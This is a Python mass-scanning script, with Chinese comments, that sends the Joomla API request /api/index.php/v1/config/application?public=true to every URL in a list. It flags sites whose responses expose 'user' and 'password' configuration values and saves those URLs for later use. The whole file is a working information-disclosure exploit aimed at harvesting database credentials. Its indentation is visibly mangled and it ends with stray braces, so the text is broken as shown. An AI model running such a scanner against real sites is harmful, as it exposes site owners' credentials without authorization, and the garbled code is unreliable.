import requests
from colorama import init, Fore
import urllib3

urllib3.disable_warnings()

init(autoreset=True)

vulnerable_urls = []

with open('urls.txt') as f:
    for url in f:
            url = url.strip()
                    if not url.startswith('https://'):
                                url = 'https://' + url
                                        
                                                headers = {
                                                                'Upgrade-Insecure-Requests': '1',
                                                                            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
                                                                                        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
                                                                                                    'Accept-Encoding': 'gzip, deflate',
                                                                                                                'Accept-Language': 'zh-CN,zh;q=0.9',
                                                                                                                            'Connection': 'close'
                                                }
                                                        proxies = {
                                                                    "http": "http://127.0.0.1:7890",
                                                                            "https": "http://127.0.0.1:7890"
                                                        }
                                                                payload = "/api/index.php/v1/config/application?public=true"
                                                                        url1 = url + payload

                                                                                try:
                                                                                            res = requests.get(url=url1, headers=headers, timeout=60, verify=False,proxies=None)

                                                                                                        if 'user' in res.text and 'password' in res.text:
                                                                                                                        print(Fore.GREEN + "[+]存在漏洞:" + url1)
                                                                                                                                        vulnerable_urls.append(url1)
                                                                                                                                                    else:
                                                                                                                                                                    print("[-]不存在漏洞:" + url1)
                                                                                                                                                                            except Exception as e:
                                                                                                                                                                                        print(Fore.RED + '[!]访问失败：' + url1)

                                                                                                                                                                                        with open('vulnerable_urls.txt', 'w') as f:
                                                                                                                                                                                            for url in vulnerable_urls:
                                                                                                                                                                                                    f.write(url + '\n')
                                                                                                                                                                                                    #如果使用了代理软件，记得将代理端口进行更换
                                                                                                                                                                                                    #脚本扫描完漏洞过后，会将存在漏洞的URL地址写入vulnerable_urls.txt文件中保存
                                                        }
                                                }